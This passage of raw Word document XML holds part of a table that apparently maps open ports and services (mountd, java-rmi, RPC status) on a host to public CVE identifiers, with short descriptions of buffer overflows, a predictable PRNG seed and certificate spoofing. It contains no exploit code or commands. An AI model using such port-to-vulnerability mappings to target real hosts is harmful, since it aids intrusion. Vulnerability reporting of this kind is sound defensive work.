              </w:rPr>
              <w:t xml:space="preserve">Domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>issued by a legitimate Certification Authority, a related issue to CVE-2009-2408</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="13C46A26" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="366"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B502001" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4BE8BF13" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>33020</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3AF7075B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mountd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="31E20487" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1-3 (RPC #100005)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46D47A0C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-1999-0002,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2003-0252</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="605AF161" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Buffer overflow in NFS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mountd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> gives root access to remote attackers, mostly in Linux systems. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BEAF9F8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Off-by-one error in the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>xlog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> function of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mountd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the Linux NFS utils package (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">-utils) before 1.0.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via certain RPC requests to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mountd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> that do not contain newlines. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20846FDE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="28A2E6C2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="366"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7128E6C1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="492967BC" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>39778 and 49600</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="547D673F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>java-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rmi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69EEAE75" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">GNU </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Classpath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>grmiregistry</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04A79ECA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2008-5659</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D836E85" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2633B491" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>gnu.java.security</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.util.PRNG</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> class in GNU </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Classpath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0.97.2 and earlier uses a predictable seed based on the system time, which makes it easier for context-dependent attackers to conduct brute force attacks against cryptographic routines that use this class for randomness, as demonstrated against DSA private keys.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="5A6EA3C4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="366"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C7B7047" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="768F186D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>58033 and 38392</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6AA8F61F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6EF6EC15" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1 (RPC #100024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11CBE641" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="63"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-1999-0019</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-1999-0493,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2000-0666</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="564D1292" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65CE4567" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">"1 (RPC #100024)" is a reference to the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CacheFS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> daemon (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>cachefsd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>) service used in Solaris operating systems. This service handles caching remote file systems locally to improve performance</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35495C81" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="7EFEAC67" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="366"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="618D8D6A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
